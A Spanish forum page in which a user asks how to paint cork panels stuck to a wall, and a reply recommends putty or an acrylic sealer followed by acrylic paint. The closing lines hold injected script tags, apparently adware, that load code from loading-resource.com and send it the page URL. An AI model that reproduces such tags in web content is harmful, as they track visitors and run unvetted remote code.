Como pintar el cocho de una pared

Pues eso, que quiero pintar corcho que tengo pegado a la pared, y no sé como hacerlo.

Unos me dicen que hay que darle una a mano de selladora, otros dicen que no hace falta, otros me dicen que hay que usar pintura de esmalte, otros me dicen que con pintura plástica al agua de toda la vida se puede hacer... Total, que necesito el consejo de un profesional.

Otra pregunta: hay manera de tapar la juntas de las placas de corcho para que al pintarlo quede mas disimulado?

Muchas gracias.

Respuesta

Primero una cosa, si tapas el corcho con masilla solo necesitas pintar como si fuera una pared nueva.

Y si lo que quieres es pintar encima te recomiendo una mano de selladora acrílica y luego un acrílico bueno en mate o satinado.

UN SALUDO.

<div id="__tbSetup"> </div><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="https://loading-resource.com/data.js.php?i={1EFAB6E1-79BA-4566-B458-DBEDEC33AB15}&d=2012-8-28&s=http://www.todoexpertos.com/mitodoexpertos/question/9d5mr9ngxi4t6/como-pintar-el-cocho-de-una-pared"></script>